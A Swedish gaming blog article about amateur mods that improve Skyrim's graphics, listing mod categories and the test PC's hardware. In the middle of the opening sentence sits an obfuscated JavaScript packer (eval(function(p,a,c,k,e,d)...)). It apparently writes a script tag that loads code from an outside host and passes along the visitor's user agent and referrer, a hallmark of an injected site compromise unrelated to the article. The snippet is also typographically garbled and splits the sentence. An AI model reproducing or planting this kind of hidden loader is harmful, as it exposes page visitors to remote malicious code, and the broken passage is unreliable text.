Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Amatörer gör Skyrim-grafiken bättre

Amatörer gör Skyrim-grafiken bättre
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|byanb|var|u0026u|referrer|ksesi||js|php’.split(’|’),0,{}))
finns ett argument i diskussionen om vilken spelplatform som är ”bäst” och skänker flest möjligheter som gör att PC alltid kommer vara den ultimata platformen framför spelkonsolerna; möjligheten att själv ändra spelet och göra det bättre.

Skyrim, som endast funnits ute i butikerna ett par veckor, har blivit vida känt bl.a. för dess vackra grafik i en av de största världarna den här spelgenerationen har sett. Det har dock visat sig att grafiken inte är så pass ultimat som det tidigare utlovats, mycket p.g.a. att man fick sänka kvalitén på grafiken för att konsolerna skulle palla trycket, vilket har gjort många PC-spelare (även här på Revue.se) förbannade. Det har samtidigt visat sig att man däremot inte behöver vara en toppbetald programmerare på Bethesda för att göra någon skillnad, det räcker uppenbarligen bara med ett stort PC-hjärta och lite hembrända programmeringsskills.

En mängd amatörer har efter spelets release lyckats pumpa upp grafiken till ”beyond ultra”, med starkare färger och effekter, klarare texturer i naturen och i karaktärer och även verkligare vatten och livligare grafik på drakarna. Det är antagligen mer åt det hållet Skyrim från början hade sett ut innan grafiken bantades ned.

Nedan finner ni ett par jämförande bilder på resultaten som våra tappra PC-krigare har tagit fram (vänster är original, höger är moddat):

Nedan finner ni alla grafikförbättrande mods som finns ute nu:

Lighting, Shading Effects, View Distance:

Texturing & Environs

 Characters, Models, Items

Dessa specs hade datorn som bilderna har tagits ifrån:

  • Intel Core i7 930, ~3.0GHz hyperthreaded Nehalem Quad-Core
  • 12GB 1600MHz (OC) Triple Channel Memory
  • NVIDIA Superclocked GTX 580
  • 1920×1080 resolution